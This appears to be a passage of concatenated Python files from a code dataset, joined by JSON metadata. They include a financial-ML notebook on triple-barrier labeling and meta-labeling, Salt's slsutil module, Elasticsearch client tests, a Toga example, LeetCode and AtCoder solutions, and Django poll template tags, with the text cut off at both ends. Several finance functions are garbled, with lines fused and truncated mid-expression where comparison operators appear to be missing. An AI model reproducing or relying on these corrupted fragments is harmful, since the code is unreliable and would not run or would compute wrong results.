dictOutputSame[fileName]=True\n else:\n dictOutputSame[fileName]=False\n\n print('{} file {} is OK'.format((i+1),fileName))\n else:\n print('{} file {} is missing'.format((i + 1), fileName))\n # if i == 1000:\n # break\n\nstrHead='Code,TimeSerial,TimeParallel,IsParallelBetterInTime,IsOutputConsistent,IsAllConsistent'\nlstTotal=[]\nlstTotal.append(strHead)\nnumOfAbnormalInTime=0\nnumOfAbnormalInOutput=0\nnumOfAbnormalInTotal=0\ntotalMillisecondSerial=0\ntotalMillisecondParallel=0\nfor i in range(0,len(listNameIntersection)):\n strName=listNameIntersection[i]\n isParallelBetterInTime=dictParallelTime[strName]= m:\n idx.append(i)\n ts = 0\n continue\n return idx\n\ndef tick_bar_df(df, column, m):\n idx = tick_bars(df, column, m)\n return df.iloc[idx]\n#========================================================\ndef volume_bars(df, column, m):\n '''\n compute volume bars\n\n # args\n df: pd.DataFrame()\n column: name for price data\n m: int(), threshold value for volume\n # returns\n idx: list of indices\n '''\n t = df[column]\n ts = 0\n idx = []\n for i, x in enumerate(tqdm(t)):\n ts += x\n if ts >= m:\n idx.append(i)\n ts = 0\n continue\n return idx\n\ndef volume_bar_df(df, column, m):\n idx = volume_bars(df, column, m)\n return df.iloc[idx]\n#========================================================\ndef dollar_bars(df, column, m):\n '''\n compute dollar bars\n\n # args\n df: pd.DataFrame()\n column: name for price data\n m: int(), threshold value for dollars\n # returns\n idx: list of indices\n '''\n t = df[column]\n ts = 0\n idx = []\n for i, x in enumerate(tqdm(t)):\n ts += x\n if ts >= m:\n idx.append(i)\n ts = 0\n continue\n return idx\n\ndef dollar_bar_df(df, column, m):\n idx = dollar_bars(df, column, m)\n return df.iloc[idx]\n#========================================================\n\n@jit(nopython=True)\ndef numba_isclose(a,b,rel_tol=1e-09,abs_tol=0.0):\n return np.fabs(a-b) <= np.fmax(rel_tol*np.fmax(np.fabs(a), np.fabs(b)), abs_tol)\n\n@jit(nopython=True)\ndef bt(p0, p1, bs):\n #if math.isclose((p1 - p0), 0.0, abs_tol=0.001):\n if numba_isclose((p1-p0),0.0,abs_tol=0.001):\n b = bs[-1]\n return b\n else:\n b = np.abs(p1-p0)/(p1-p0)\n return b\n\n@jit(nopython=True)\ndef get_imbalance(t):\n bs = np.zeros_like(t)\n for i in np.arange(1, bs.shape[0]):\n t_bt = bt(t[i-1], t[i], bs[:i-1])\n bs[i-1] = t_bt\n return bs[:-1] # remove last value\n\n\n# ## Code Snippets\n# \n# Below I reproduce all the relevant code snippets found in the book that are necessary to work through the excercises found at the end of chapter 3.\n\n# ### Symmetric CUSUM Filter [2.5.2.1]\n\n# In[175]:\n\n\ndef getTEvents(gRaw, h):\n tEvents, sPos, sNeg = [], 0, 0\n diff = np.log(gRaw).diff().dropna().abs()\n for i in tqdm(diff.index[1:]):\n try:\n pos, neg = (sPos+diff.loc[i]).astype(float), (sNeg+diff.loc[i]).astype(float)\n except Exception as e:\n print(e)\n print(sPos+diff.loc[i], type(sPos+diff.loc[i]))\n print(sNeg+diff.loc[i], type(sNeg+diff.loc[i]))\n break\n sPos, sNeg=max(0., pos.all()), min(0., neg.all())\n if sNeg<-h:\n sNeg=0;tEvents.append(i)\n elif sPos>h:\n sPos=0;tEvents.append(i)\n return pd.DatetimeIndex(tEvents)\n\n\n# ### Daily Volatility Estimator [3.1]\n\n# In[176]:\n\n\ndef getDailyVol(close,span0=100):\n # daily vol reindexed to close\n print('close; ')\n print(close)\n print('close.index-pd.Timedelta; ')\n print(close.index-pd.Timedelta(days=1))\n df0=close.index.searchsorted(close.index-pd.Timedelta(days=1))\n #print('\\n df0 1\\n', df0)\n df0=df0[df0>0] \n #print('\\n df0 2\\n', df0)\n df0=(pd.Series(close.index[df0-1],index=close.index[close.shape[0]-df0.shape[0]:])) \n #print('\\n df0 3\\n', df0)\n \n try:\n print('\\n df0 index\\n', df0.index)\n print('\\n df0 values\\n', df0.values)\n dfidxs=close.loc[df0.index].drop_duplicates()\n dfvals=close.loc[df0.values]#.iloc[:dfidxs.size] #.drop_duplicates()\n print('\\n close.loc[df0.index]\\n', dfidxs)\n print('\\n close.loc[df0.values]\\n', dfvals)\n #df1=(dfidxs.values/dfvals.values) -1 # daily rets\n df0=(dfidxs/dfvals.values) -1 # daily rets\n print('\\n df1\\n',df1)\n except Exception as e:\n print(e)\n print('adjusting shape of close.loc[df0.index]')\n cut = close.loc[df0.index].shape[0] - close.loc[df0.values].shape[0]\n df0=close.loc[df0.index].iloc[:-cut]/close.loc[df0.values].values-1\n \n #df4=pd.Series(df1).ewm(span=span0).std().dropna()\n #df0=pd.Series(df1).ewm(span=span0).std().dropna()\n df0=(df0).ewm(span=span0).std().dropna()\n\n #print('\\n df4\\n', df4)\n #df2=(pd.Series(df4.values,index=close.index[close.shape[0]-df4.shape[0]:]))\n #print('\\n df2\\n', df2)\n #return df2\n return df0\n\n\n# ### Triple-Barrier Labeling Method [3.2]\n\n# In[177]:\n\n\ndef applyPtSlOnT1(close,events,ptSl,molecule):\n # apply stop loss/profit taking, if it takes place before t1 (end of event)\n events_=events.loc[molecule]\n print('in applyPtSlOnT1',close,'events',events,'ptSl',ptSl,'molecule',molecule)\n out=events_[['t1']].copy(deep=True)\n print('out',out)\n if ptSl[0]>0: pt=ptSl[0]*events_['trgt']\n else: pt=pd.Series(index=events.index) # NaNs\n if ptSl[1]>0: sl=-ptSl[1]*events_['trgt']\n else: sl=pd.Series(index=events.index) # NaNs\n i=0\n for loc,t1 in events_['t1'].fillna(close.index[-1]).iteritems():\n try:\n df0=close[loc:t1] # path prices\n #print('\\niter ', i, 'df0 \\n',df0)\n df0=(df0/close[loc]-1)*events_.at[loc,'side'] # path returns\n out.loc[loc,'sl']=df0[df0pt[loc]].index.min() # earliest profit taking\n #print('out \\n',out)\n i=i+1\n except Exception as e:\n pass#print(e)\n return out\n\n\n# ### Gettting Time of First Touch (getEvents) [3.3], [3.6]\n\n# In[171]:\n\n\ndef getEvents(close, tEvents, ptSl, trgt, minRet, numThreads, t1=False, side=None):\n trgt=trgt.dropna()\n #1) get target\n trgt=trgt.loc[tEvents]\n trgt=trgt[trgt>minRet] # minRet\n #2) get t1 (max holding period)\n if t1 is False:t1=pd.Series(pd.NaT, index=tEvents.drop_duplicates())\n #3) form events object, apply stop loss on t1\n if side is None:side_,ptSl_=pd.Series(1.,index=trgt.index), [ptSl[0],ptSl[0]]\n else: side_,ptSl_=side.loc[trgt.index],ptSl[:2]\n #trgt=trgt.iloc[trgt.size-t1.size:]\n #side_=side_.iloc[side_.size-t1.size:]\n print('\\nin getEvents','trgt\\n', trgt,'t1\\n', t1,'side\\n', side_)\n events=(pd.concat({'trgt':trgt,'side':side_}, axis=1,ignore_index=True).dropna().drop_duplicates())\n #events=pd.concat({'t1':t1,'side':events.columns[0],'trgt':events.columns[1]},ignore_index=True)\n events=events.merge(pd.DataFrame(t1),right_index=True,left_index=True).dropna().drop_duplicates()\n \n events=events.rename(columns={ events.columns[0]: \"side\",events.columns[1]: \"trgt\",events.columns[2]: \"t1\" })\n print('\\nin getEvents','close\\n', close,'events\\n', events,'ptsl\\n', ptSl_,'molecule\\n' ,events.index)\n \n #df0=mpPandasObj(func=applyPtSlOnT1,pdObj=('molecule',events.index),numThreads=numThreads,close=close,events=events,ptSl=ptSl_)\n df0=applyPtSlOnT1(close, events, ptSl_, events.index)\n print('df0 after applyPtSl',df0)\n events['t1']=df0.dropna()#how='all').min(axis=1) # pd.min ignores nan\n if side is None:events=events.drop('side',axis=1)\n return events\n\n\n# ### Adding Vertical Barrier [3.4]\n\n# In[135]:\n\n\ndef addVerticalBarrier(tEvents, close, numDays=1):\n t1=close.index.searchsorted(tEvents+pd.Timedelta(days=numDays))\n t1=t1[t1minPct or df0.shape[0]<3:break\n print('dropped label: ', df0.argmin(),df0.min())\n events=events[events['bin']!=df0.argmin()]\n return events\n\n\n# ### Linear Partitions [20.4.1]\n\n# In[139]:\n\n\ndef linParts(numAtoms,numThreads):\n # partition of atoms with a single loop\n parts=np.linspace(0,numAtoms,min(numThreads,numAtoms)+1)\n parts=np.ceil(parts).astype(int)\n return parts\n\n\n# In[140]:\n\n\ndef nestedParts(numAtoms,numThreads,upperTriang=False):\n # partition of atoms with an inner loop\n parts,numThreads_=[0],min(numThreads,numAtoms)\n for num in range(numThreads_):\n part=1+4*(parts[-1]**2+parts[-1]+numAtoms*(numAtoms+1.)/numThreads_)\n part=(-1+part**.5)/2.\n parts.append(part)\n parts=np.round(parts).astype(int)\n if upperTriang: # the first rows are heaviest\n parts=np.cumsum(np.diff(parts)[::-1])\n parts=np.append(np.array([0]),parts)\n return parts\n\n\n# ### multiprocessing snippet [20.7]\n\n# In[141]:\n\n\ndef mpPandasObj(func,pdObj,numThreads=24,mpBatches=1,linMols=True,**kargs):\n '''\n Parallelize jobs, return a dataframe or series\n + func: function to be parallelized. Returns a DataFrame\n + pdObj[0]: Name of argument used to pass the molecule\n + pdObj[1]: List of atoms that will be grouped into molecules\n + kwds: any other argument needed by func\n \n Example: df1=mpPandasObj(func,('molecule',df0.index),24,**kwds)\n '''\n import pandas as pd\n #if linMols:parts=linParts(len(argList[1]),numThreads*mpBatches)\n #else:parts=nestedParts(len(argList[1]),numThreads*mpBatches)\n if linMols:parts=linParts(len(pdObj[1]),numThreads*mpBatches)\n else:parts=nestedParts(len(pdObj[1]),numThreads*mpBatches)\n \n jobs=[]\n for i in range(1,len(parts)):\n job={pdObj[0]:pdObj[1][parts[i-1]:parts[i]],'func':func}\n job.update(kargs)\n jobs.append(job)\n if numThreads==1:out=processJobs_(jobs)\n else: out=processJobs(jobs,numThreads=numThreads)\n if isinstance(out[0],pd.DataFrame):df0=pd.DataFrame()\n elif isinstance(out[0],pd.Series):df0=pd.Series()\n else:return out\n for i in out:df0=df0.append(i)\n df0=df0.sort_index()\n return df0\n\n\n# ### single-thread execution for debugging [20.8]\n\n# In[142]:\n\n\ndef processJobs_(jobs):\n # Run jobs sequentially, for debugging\n out=[]\n for job in jobs:\n out_=expandCall(job)\n out.append(out_)\n return out\n\n\n# ### Example of async call to multiprocessing lib [20.9]\n\n# In[143]:\n\n\nimport multiprocessing as mp\nimport datetime as dt\n\n#________________________________\ndef reportProgress(jobNum,numJobs,time0,task):\n # Report progress as asynch jobs are completed\n msg=[float(jobNum)/numJobs, (time.time()-time0)/60.]\n msg.append(msg[1]*(1/msg[0]-1))\n timeStamp=str(dt.datetime.fromtimestamp(time.time()))\n msg=timeStamp+' '+str(round(msg[0]*100,2))+'% '+task+' done after '+ str(round(msg[1],2))+' minutes. Remaining '+str(round(msg[2],2))+' minutes.'\n if jobNum df.slow\n return df.fast[(crit1) & (crit2)]\n\ndef get_down_cross(df):\n crit1 = df.fast.shift(1) > df.slow\n crit2 = df.fast < df.slow\n return df.fast[(crit1) & (crit2)]\n\nup = get_up_cross(close_df)\ndown = get_down_cross(close_df)\n\nf, ax = plt.subplots(figsize=(11,8))\n\nclose_df.loc['2014':].plot(ax=ax, alpha=.5)\nup.loc['2014':].plot(ax=ax,ls='',marker='^', markersize=7,\n alpha=0.75, label='upcross', color='g')\ndown.loc['2014':].plot(ax=ax,ls='',marker='v', markersize=7, \n alpha=0.75, label='downcross', color='r')\n\nax.legend()\n\n\n# ### (a) Derive meta-labels for `ptSl = [1,2]` and `t1` where `numdays=1`. Use as `trgt` dailyVol computed by snippet 3.1 (get events with sides)\n\n# In[261]:\n\n\nside_up = pd.Series(1, index=up.index)\nside_down = pd.Series(-1, index=down.index)\nside = pd.concat([side_up,side_down]).sort_index()\ncprint(side)\n\n\n# In[267]:\n\n\nminRet = .01 \nptsl=[1,2]\nma_events = getEvents(close,tEvents,ptsl,target,minRet,cpus,t1=t1,side=side)\ncprint(ma_events)\n\n\n# In[224]:\n\n\nma_events.side.value_counts()\n\n\n# In[268]:\n\n\nma_side = ma_events.dropna().side\n\n\n# In[269]:\n\n\nma_bins = getBins(ma_events,close).dropna()\ncprint(ma_bins)\n\n\n# In[265]:\n\n\nXx = pd.merge_asof(ma_bins, side.to_frame().rename(columns={0:'side'}),\n left_index=True, right_index=True, direction='forward')\ncprint(Xx)\n\n\n# ### (b) Train Random Forest to decide whether to trade or not `{0,1}` since underlying model (crossing m.a.) has decided the side, `{-1,1}`\n\n# In[227]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_curve, classification_report\n\n\n# In[270]:\n\n\nX = ma_side.values.reshape(-1,1)\n#X = Xx.side.values.reshape(-1,1)\ny = ma_bins.bin.values\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5)\n\nn_estimator = 10000\nrf = RandomForestClassifier(max_depth=2, n_estimators=n_estimator,\n criterion='entropy', random_state=RANDOM_STATE)\nrf.fit(X_train, y_train)\n\n# The random forest model by itself\ny_pred_rf = rf.predict_proba(X_test)[:, 1]\ny_pred = rf.predict(X_test)\nfpr_rf, tpr_rf, _ = roc_curve(y_test, y_pred_rf)\nprint(classification_report(y_test, y_pred))\n\nplt.figure(1)\nplt.plot([0, 1], [0, 1], 'k--')\nplt.plot(fpr_rf, tpr_rf, label='RF')\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.legend(loc='best')\nplt.show()\n\n\n# ## [3.5] Develop mean-reverting Bollinger Band Strategy. For each obs. model suggests a side but not size of the bet.\n\n# In[230]:\n\n\ndef bbands(price, window=None, width=None, numsd=None):\n \"\"\" returns average, upper band, and lower band\"\"\"\n ave = price.rolling(window).mean()\n sd = price.rolling(window).std(ddof=0)\n if width:\n upband = ave * (1+width)\n dnband = ave * (1-width)\n return price, np.round(ave,3), np.round(upband,3), np.round(dnband,3) \n if numsd:\n upband = ave + (sd*numsd)\n dnband = ave - (sd*numsd)\n return price, np.round(ave,3), np.round(upband,3), np.round(dnband,3)\n\n\n# In[231]:\n\n\nwindow=50\nbb_df = pd.DataFrame()\nbb_df['price'],bb_df['ave'],bb_df['upper'],bb_df['lower']=bbands(close, window=window, numsd=1)\nbb_df.dropna(inplace=True)\ncprint(bb_df)\n\n\n# In[232]:\n\n\nf,ax=plt.subplots(figsize=(11,8))\nbb_df.loc['2014'].plot(ax=ax)\n\n\n# In[233]:\n\n\ndef get_up_cross(df, col):\n # col is price column\n crit1 = df[col].shift(1) < df.upper \n crit2 = df[col] > df.upper\n return df[col][(crit1) & (crit2)]\n\ndef get_down_cross(df, col):\n # col is price column \n crit1 = df[col].shift(1) > df.lower \n crit2 = df[col] < df.lower\n return df[col][(crit1) & (crit2)]\n\nbb_down = get_down_cross(bb_df, 'price')\nbb_up = get_up_cross(bb_df, 'price') \n\nf, ax = plt.subplots(figsize=(11,8))\n\nbb_df.loc['2014':].plot(ax=ax, alpha=.5)\nbb_up.loc['2014':].plot(ax=ax, ls='', marker='^', markersize=7,\n alpha=0.75, label='upcross', color='g')\nbb_down.loc['2014':].plot(ax=ax, ls='', marker='v', markersize=7, \n alpha=0.75, label='downcross', color='r')\nax.legend()\n\n\n# ### (a) Derive meta-labels for `ptSl=[0,2]` and `t1` where `numdays=1`. Use as `trgt` dailyVol.\n\n# In[300]:\n\n\nbb_side_up = pd.Series(-1, index=bb_up.index) # sell on up cross for mean reversion\nbb_side_down = pd.Series(1, index=bb_down.index) # buy on down cross for mean reversion\nbb_side_raw = pd.concat([bb_side_up,bb_side_down]).sort_index()\ncprint(bb_side_raw)\n\nminRet = .01 \nptsl=[0,2]\nbb_events = getEvents(close,tEvents,ptsl,target,minRet,cpus,t1=t1,side=bb_side_raw)\ncprint(bb_events)\n\nbb_side = bb_events.dropna().side\ncprint(bb_side)\n\n\n# In[290]:\n\n\nbb_side.value_counts()\n\n\n# In[301]:\n\n\nbb_bins = getBins(bb_events,close).dropna()\ncprint(bb_bins)\n\n\n# In[292]:\n\n\nbb_bins.bin.value_counts()\n\n\n# ### (b) train random forest to decide to trade or not. Use features: volatility, serial correlation, and the crossing moving averages from exercise 2.\n\n# In[293]:\n\n\ndef returns(s):\n arr = np.diff(np.log(s))\n return (pd.Series(arr, index=s.index[1:]))\n\ndef df_rolling_autocorr(df, window, lag=1):\n \"\"\"Compute rolling column-wise autocorrelation for a DataFrame.\"\"\"\n\n return (df.rolling(window=window)\n .corr(df.shift(lag))) # could .dropna() here\n\n#df_rolling_autocorr(d1, window=21).dropna().head()\n\n\n# In[294]:\n\n\nsrl_corr = df_rolling_autocorr(returns(close), window=window).rename('srl_corr')\ncprint(srl_corr)\n\n\n# In[302]:\n\n\nfeatures = (pd.DataFrame()\n .assign(vol=bb_events.trgt)\n .assign(ma_side=ma_side)\n .assign(srl_corr=srl_corr)\n .drop_duplicates()\n .dropna())\ncprint(features)\n\n\n# In[303]:\n\n\nXy = (pd.merge_asof(features, bb_bins[['bin']], \n left_index=True, right_index=True, \n direction='forward').dropna())\ncprint(Xy)\n\n\n# In[297]:\n\n\nXy.bin.value_counts()\n\n\n# In[305]:\n\n\nX = Xy.drop('bin',axis=1).values\ny = Xy['bin'].values\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, shuffle=False)\n\nn_estimator = 10000\nrf = RandomForestClassifier(max_depth=2, n_estimators=n_estimator,\n criterion='entropy', random_state=RANDOM_STATE)\nrf.fit(X_train, y_train)\n\n# The random forest model by itself\ny_pred_rf = rf.predict_proba(X_test)[:, 1]\ny_pred = rf.predict(X_test)\nfpr_rf, tpr_rf, _ = roc_curve(y_test, y_pred_rf)\nprint(classification_report(y_test, y_pred, target_names=['no_trade','trade']))\n\nplt.figure(1)\nplt.plot([0, 1], [0, 1], 'k--')\nplt.plot(fpr_rf, tpr_rf, label='RF')\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.legend(loc='best')\nplt.show()\n\n\n# ### (c) What is accuracy of predictions from primary model if the secondary model does not filter bets? What is classification report?\n\n# In[299]:\n\n\nminRet = .01 \nptsl=[0,2]\nbb_events = getEvents(close,tEvents,ptsl,target,minRet,cpus,t1=t1)\ncprint(bb_events)\n\nbb_bins = getBins(bb_events,close).dropna()\ncprint(bb_bins)\n\nfeatures = (pd.DataFrame()\n .assign(vol=bb_events.trgt)\n .assign(ma_side=ma_side)\n .assign(srl_corr=srl_corr)\n .drop_duplicates()\n .dropna())\ncprint(features)\n\nXy = (pd.merge_asof(features, bb_bins[['bin']], \n left_index=True, right_index=True, \n direction='forward').dropna())\ncprint(Xy)\n\n### run model ###\nX = Xy.drop('bin',axis=1).values\ny = Xy['bin'].values\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, shuffle=False)\n\nn_estimator = 10000\nrf = RandomForestClassifier(max_depth=2, n_estimators=n_estimator,\n criterion='entropy', random_state=RANDOM_STATE)\nrf.fit(X_train, y_train)\n\n# The random forest model by itself\ny_pred_rf = rf.predict_proba(X_test)[:, 1]\ny_pred = rf.predict(X_test)\nfpr_rf, tpr_rf, _ = roc_curve(y_test, y_pred_rf)\nprint(classification_report(y_test, y_pred))\n\nplt.figure(1)\nplt.plot([0, 1], [0, 1], 'k--')\nplt.plot(fpr_rf, tpr_rf, label='RF')\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.legend(loc='best')\nplt.show()\n\n\n# In[ ]:\n","sub_path":"Labeling and MetaLabeling for Supervised Classification.py","file_name":"Labeling and MetaLabeling for Supervised Classification.py","file_ext":"py","file_size_in_byte":27676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"565408831","text":"# -*- coding: utf-8 -*-\n'''\nUtility functions for use with or in SLS files\n'''\n\n# Import Python libs\nfrom __future__ import absolute_import, unicode_literals, print_function\n\n# Import Salt libs\nimport salt.exceptions\nimport salt.loader\nimport salt.template\nimport salt.utils.args\nimport salt.utils.dictupdate\n\n\ndef update(dest, upd, recursive_update=True, merge_lists=False):\n '''\n Merge ``upd`` recursively into ``dest``\n\n If ``merge_lists=True``, will aggregate list object types instead of\n replacing. This behavior is only activated when ``recursive_update=True``.\n\n CLI Example:\n\n .. code-block:: shell\n\n salt '*' slsutil.update '{foo: Foo}' '{bar: Bar}'\n\n '''\n return salt.utils.dictupdate.update(dest, upd, recursive_update,\n merge_lists)\n\n\ndef merge(obj_a, obj_b, strategy='smart', renderer='yaml', merge_lists=False):\n '''\n Merge a data structure into another by choosing a merge strategy\n\n Strategies:\n\n * aggregate\n * list\n * overwrite\n * recurse\n * smart\n\n CLI Example:\n\n .. code-block:: shell\n\n salt '*' slsutil.merge '{foo: Foo}' '{bar: Bar}'\n '''\n return salt.utils.dictupdate.merge(obj_a, obj_b, strategy, renderer,\n merge_lists)\n\n\ndef renderer(path=None, string=None, default_renderer='jinja|yaml', **kwargs):\n '''\n Parse a string or file through Salt's renderer system\n\n .. versionchanged:: 2018.3.0\n Add support for Salt fileserver URIs.\n\n This is an open-ended function and can be used for a variety of tasks. It\n makes use of Salt's \"renderer pipes\" system to run a string or file through\n a pipe of any of the loaded renderer modules.\n\n :param path: The path to a file on Salt's fileserver (any URIs supported by\n :py:func:`cp.get_url `) or on the local file\n system.\n :param string: An inline string to be used as the file to send through the\n renderer system. Note, not all renderer modules can work with strings;\n the 'py' renderer requires a file, for example.\n :param default_renderer: The renderer pipe to send the file through; this\n is overridden by a \"she-bang\" at the top of the file.\n :param kwargs: Keyword args to pass to Salt's compile_template() function.\n\n Keep in mind the goal of each renderer when choosing a render-pipe; for\n example, the Jinja renderer processes a text file and produces a string,\n however the YAML renderer processes a text file and produces a data\n structure.\n\n One possible use is to allow writing \"map files\", as are commonly seen in\n Salt formulas, but without tying the renderer of the map file to the\n renderer used in the other sls files. In other words, a map file could use\n the Python renderer and still be included and used by an sls file that uses\n the default 'jinja|yaml' renderer.\n\n For example, the two following map files produce identical results but one\n is written using the normal 'jinja|yaml' and the other is using 'py':\n\n .. code-block:: jinja\n\n #!jinja|yaml\n {% set apache = salt.grains.filter_by({\n ...normal jinja map file here...\n }, merge=salt.pillar.get('apache:lookup')) %}\n {{ apache | yaml() }}\n\n .. code-block:: python\n\n #!py\n def run():\n apache = __salt__.grains.filter_by({\n ...normal map here but as a python dict...\n }, merge=__salt__.pillar.get('apache:lookup'))\n return apache\n\n Regardless of which of the above map files is used, it can be accessed from\n any other sls file by calling this function. The following is a usage\n example in Jinja:\n\n .. code-block:: jinja\n\n {% set apache = salt.slsutil.renderer('map.sls') %}\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' slsutil.renderer salt://path/to/file\n salt '*' slsutil.renderer /path/to/file\n salt '*' slsutil.renderer /path/to/file.jinja 'jinja'\n salt '*' slsutil.renderer /path/to/file.sls 'jinja|yaml'\n salt '*' slsutil.renderer string='Inline template! {{ saltenv }}'\n salt '*' slsutil.renderer string='Hello, {{ name }}.' name='world'\n '''\n if not path and not string:\n raise salt.exceptions.SaltInvocationError(\n 'Must pass either path or string')\n\n renderers = salt.loader.render(__opts__, __salt__)\n\n if path:\n path_or_string = __salt__['cp.get_url'](path)\n elif string:\n path_or_string = ':string:'\n kwargs['input_data'] = string\n\n return salt.template.compile_template(\n path_or_string,\n renderers,\n default_renderer,\n __opts__['renderer_blacklist'],\n __opts__['renderer_whitelist'],\n **kwargs)\n\n\ndef _get_serialize_fn(serializer, fn_name):\n serializers = salt.loader.serializers(__opts__)\n fns = getattr(serializers, serializer, None)\n fn = getattr(fns, fn_name, None)\n\n if not fns:\n raise salt.exceptions.CommandExecutionError(\n \"Serializer '{0}' not found.\".format(serializer))\n\n if not fn:\n raise salt.exceptions.CommandExecutionError(\n \"Serializer '{0}' does not implement {1}.\".format(serializer,\n fn_name))\n\n return fn\n\n\ndef serialize(serializer, obj, **mod_kwargs):\n '''\n Serialize a Python object using a :py:mod:`serializer module\n `\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' --no-parse=obj slsutil.serialize 'json' obj=\"{'foo': 'Foo!'}\n\n Jinja Example:\n\n .. code-block:: jinja\n\n {% set json_string = salt.slsutil.serialize('json',\n {'foo': 'Foo!'}) %}\n '''\n kwargs = salt.utils.args.clean_kwargs(**mod_kwargs)\n return _get_serialize_fn(serializer, 'serialize')(obj, **kwargs)\n\n\ndef deserialize(serializer, stream_or_string, **mod_kwargs):\n '''\n Deserialize a Python object using a :py:mod:`serializer module\n `\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' slsutil.deserialize 'json' '{\"foo\": \"Foo!\"}'\n salt '*' --no-parse=stream_or_string slsutil.deserialize 'json' \\\\\n stream_or_string='{\"foo\": \"Foo!\"}'\n\n Jinja Example:\n\n .. code-block:: jinja\n\n {% set python_object = salt.slsutil.deserialize('json',\n '{\"foo\": \"Foo!\"}') %}\n '''\n kwargs = salt.utils.args.clean_kwargs(**mod_kwargs)\n return _get_serialize_fn(serializer, 'deserialize')(stream_or_string,\n **kwargs)\n","sub_path":"salt/modules/slsutil.py","file_name":"slsutil.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"42034162","text":"N = int(input())\nA = sorted(list(map(int, input().split())))\n\nans = 0\nMOD = 10**9+7\ntotal = sum(A)\n\nfor i in range(N-1):\n tmp = A[i]\n total -= tmp\n ans += (tmp * total) % MOD\n ans %= MOD\n\nprint(ans)","sub_path":"atcoder/2020/ABC/0829_abc177/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"13506573","text":"import toga\nfrom toga.style import Pack\nfrom toga.constants import COLUMN, LEFT\n\n\nclass ScrollContainerApp(toga.App):\n def startup(self):\n self.main_window = toga.MainWindow(self.name)\n box = toga.Box()\n box.style.direction = COLUMN\n\n for x in range(100):\n label_text = 'Label %d' % (x)\n box.add(toga.Label(label_text, style=Pack(text_align=LEFT)))\n\n scroller = toga.ScrollContainer()\n scroller.content = box\n\n self.main_window.content = scroller\n self.main_window.show()\n\n\ndef main():\n return ScrollContainerApp('ScrollContainer', 'org.beeware.widgets.scrollcontainer')\n\n\nif __name__ == '__main__':\n app = main()\n app.main_loop()\n","sub_path":"examples/scrollcontainer/scrollcontainer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"359538817","text":"# -*- coding: utf-8 -*-\n# Licensed to Elasticsearch B.V under one or more agreements.\n# Elasticsearch B.V licenses this file to you under the Apache 2.0 License.\n# See the LICENSE file in the project root for more information\n\nfrom __future__ import unicode_literals\n\nfrom . import ElasticsearchTestCase\n\n\nclass TestUnicode(ElasticsearchTestCase):\n def test_indices_analyze(self):\n self.client.indices.analyze(body='{\"text\": \"привет\"}')\n\n\nclass TestBulk(ElasticsearchTestCase):\n def test_bulk_works_with_string_body(self):\n docs = '{ \"index\" : { \"_index\" : \"bulk_test_index\", \"_id\" : \"1\" } }\\n{\"answer\": 42}'\n response = self.client.bulk(body=docs)\n\n self.assertFalse(response[\"errors\"])\n self.assertEqual(1, len(response[\"items\"]))\n\n def test_bulk_works_with_bytestring_body(self):\n docs = b'{ \"index\" : { \"_index\" : \"bulk_test_index\", \"_id\" : \"2\" } }\\n{\"answer\": 42}'\n response = self.client.bulk(body=docs)\n\n self.assertFalse(response[\"errors\"])\n self.assertEqual(1, len(response[\"items\"]))\n","sub_path":"test_elasticsearch/test_server/test_clients.py","file_name":"test_clients.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"300461930","text":"# https://leetcode.com/problems/two-sum/\n\nfrom typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n cache = {} # { value: idx }\n\n for idx in range(0, len(nums)):\n num = target - nums[idx]\n\n if num in cache:\n return [idx, cache[num]]\n\n cache[nums[idx]] = idx\n\n return\n\n\nsol = Solution()\n\nprint(sol.twoSum([2, 7, 11, 15], 9)) # [0, 1]\n","sub_path":"Easy/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"600488959","text":"from django import template\r\nfrom poll.models import Poll, Item, Queue\r\nfrom django.conf import settings\r\nfrom django.utils.safestring import SafeUnicode\r\nfrom django.utils.datetime_safe import datetime\r\nfrom poll.ajax import authpass\r\n\r\n\r\nregister = template.Library()\r\n\r\n\r\n@register.inclusion_tag('polls.html', takes_context=True)\r\ndef poll(context, poll):\r\n can_vote = True\r\n if poll.queue:\r\n can_vote = authpass(context['user'], poll.queue)\r\n return {'poll': poll,\r\n 'poll_type': poll.print_polltype(),\r\n 'items': Item.objects.filter(poll=poll),\r\n 'user': context['user'],\r\n 'can_vote': can_vote,\r\n 'request': context['request'],\r\n 'STATIC_URL': settings.STATIC_URL}\r\n\r\n\r\n@register.inclusion_tag('polls.html', takes_context=True)\r\ndef poll_queue(context, queue=None):\r\n try:\r\n if not queue:\r\n tmp_polls = Poll.objects.filter(startdate__lte=datetime.now().date)\r\n elif isinstance(queue, SafeUnicode):\r\n tmp_queue = Queue.objects.get(title=queue)\r\n else:\r\n tmp_queue = Queue.objects.get(queue)\r\n\r\n except:\r\n raise Exception('Queue not found')\r\n\r\n if queue:\r\n tmp_polls = Poll.publish_manager.filter(queue=tmp_queue,\r\n startdate__lte=datetime.now())\r\n if len(tmp_polls) > 0:\r\n cur_poll = tmp_polls[0]\r\n return poll(context, cur_poll)\r\n else:\r\n cur_poll = None\r\n\r\n\r\n\r\nclass 